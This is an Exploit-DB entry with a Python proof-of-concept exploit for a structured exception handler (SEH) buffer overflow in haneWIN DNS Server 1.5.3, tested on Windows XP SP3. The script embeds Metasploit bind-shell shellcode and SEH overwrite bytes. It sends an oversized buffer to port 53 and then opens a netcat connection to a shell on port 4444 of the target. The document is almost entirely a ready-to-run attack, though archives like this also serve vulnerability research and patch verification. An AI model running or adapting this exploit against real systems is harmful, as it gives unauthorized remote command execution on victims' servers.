haneWIN DNS Server 1.5.3 - Buffer Overflow Exploit (SEH)



EDB-ID: 31260 CVE: N/A OSVDB-ID: 102773
Author: Dario Estrada Published: 2014-01-29 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
#!/usr/bin/python
 
# Exploit Title: haneWIN DNS Server (SEH)
# Author: Dario Estrada (dash) https://intrusionlabs.org
# Date: 2014-01-29
# Version: haneWIN DNS Server 1.5.3
# Vendor Homepage: http://www.hanewin.net/
# Vulnerable app link:http://www.hanewin.net/dns-e.htm
# Tested on: Windows XP SP3
# Thanks to God, to my family and all my friends for always being there
#
# Description:
# A SEH overflow occurs when large amount of data is sent to the server 
#
import socket, sys, os, time
 
usage = "\n  Usage: " + sys.argv[0] + " <host> \n"
 
if len(sys.argv) < 2:
    print usage
    sys.exit(0)
 
host = sys.argv[1]

shellcode = (
#msfpayload windows/shell_bind_tcp R | msfencode -t c -b '\x00\xff\x0a\x0d'
"\xb8\xdf\x64\x04\x29\xd9\xc7\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x56\x31\x45\x13\x83\xed\xfc\x03\x45\xd0\x86\xf1\xd5\x06\xcf"
"\xfa\x25\xd6\xb0\x73\xc0\xe7\xe2\xe0\x80\x55\x33\x62\xc4\x55"
"\xb8\x26\xfd\xee\xcc\xee\xf2\x47\x7a\xc9\x3d\x58\x4a\xd5\x92"
"\x9a\xcc\xa9\xe8\xce\x2e\x93\x22\x03\x2e\xd4\x5f\xeb\x62\x8d"
"\x14\x59\x93\xba\x69\x61\x92\x6c\xe6\xd9\xec\x09\x39\xad\x46"
"\x13\x6a\x1d\xdc\x5b\x92\x16\xba\x7b\xa3\xfb\xd8\x40\xea\x70"
"\x2a\x32\xed\x50\x62\xbb\xdf\x9c\x29\x82\xef\x11\x33\xc2\xc8"
"\xc9\x46\x38\x2b\x74\x51\xfb\x51\xa2\xd4\x1e\xf1\x21\x4e\xfb"
"\x03\xe6\x09\x88\x08\x43\x5d\xd6\x0c\x52\xb2\x6c\x28\xdf\x35"
"\xa3\xb8\x9b\x11\x67\xe0\x78\x3b\x3e\x4c\x2f\x44\x20\x28\x90"
"\xe0\x2a\xdb\xc5\x93\x70\xb4\x2a\xae\x8a\x44\x24\xb9\xf9\x76"
"\xeb\x11\x96\x3a\x64\xbc\x61\x3c\x5f\x78\xfd\xc3\x5f\x79\xd7"
"\x07\x0b\x29\x4f\xa1\x33\xa2\x8f\x4e\xe6\x65\xc0\xe0\x58\xc6"
"\xb0\x40\x08\xae\xda\x4e\x77\xce\xe4\x84\x0e\xc8\x2a\xfc\x43"
"\xbf\x4e\x02\x72\x63\xc6\xe4\x1e\x8b\x8e\xbf\xb6\x69\xf5\x77"
"\x21\x91\xdf\x2b\xfa\x05\x57\x22\x3c\x29\x68\x60\x6f\x86\xc0"
"\xe3\xfb\xc4\xd4\x12\xfc\xc0\x7c\x5c\xc5\x83\xf7\x30\x84\x32"
"\x07\x19\x7e\xd6\x9a\xc6\x7e\x91\x86\x50\x29\xf6\x79\xa9\xbf"
"\xea\x20\x03\xdd\xf6\xb5\x6c\x65\x2d\x06\x72\x64\xa0\x32\x50"
"\x76\x7c\xba\xdc\x22\xd0\xed\x8a\x9c\x96\x47\x7d\x76\x41\x3b"
"\xd7\x1e\x14\x77\xe8\x58\x19\x52\x9e\x84\xa8\x0b\xe7\xbb\x05"
"\xdc\xef\xc4\x7b\x7c\x0f\x1f\x38\x8c\x5a\x3d\x69\x05\x03\xd4"
"\x2b\x48\xb4\x03\x6f\x75\x37\xa1\x10\x82\x27\xc0\x15\xce\xef"
"\x39\x64\x5f\x9a\x3d\xdb\x60\x8f"
)

nSEH = '\xeb\x06\x90\x90'
SEH = '\xd1\x07\xfc\x7f'
opcode = "\xe9\xdf\xf6\xff\xff"
junk = 'A' * (2324 - len(shellcode))
padding = 'A' * 600

buff = shellcode + junk + nSEH + SEH + opcode + padding

print "[+] Connecting to %s:53" % (host)
try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((host, 53))
	aix= shellcode + 'A' * (2324 - len(shellcode)) 
	print "[*] Sending payload.." + " shellcode: " + str(len(shellcode))
	s.send(buff)
	print "[*] Exploit Sent Successfully!"
	s.close()
    	print "[+] Waiting for 5 sec before spawning shell to " + host + ":4444\r"
    	time.sleep(5)
	os.system ("nc -n " + host + " 4444")
except:	
	print "[!] Could not connect to " + host + ":53\r"
        sys.exit(0)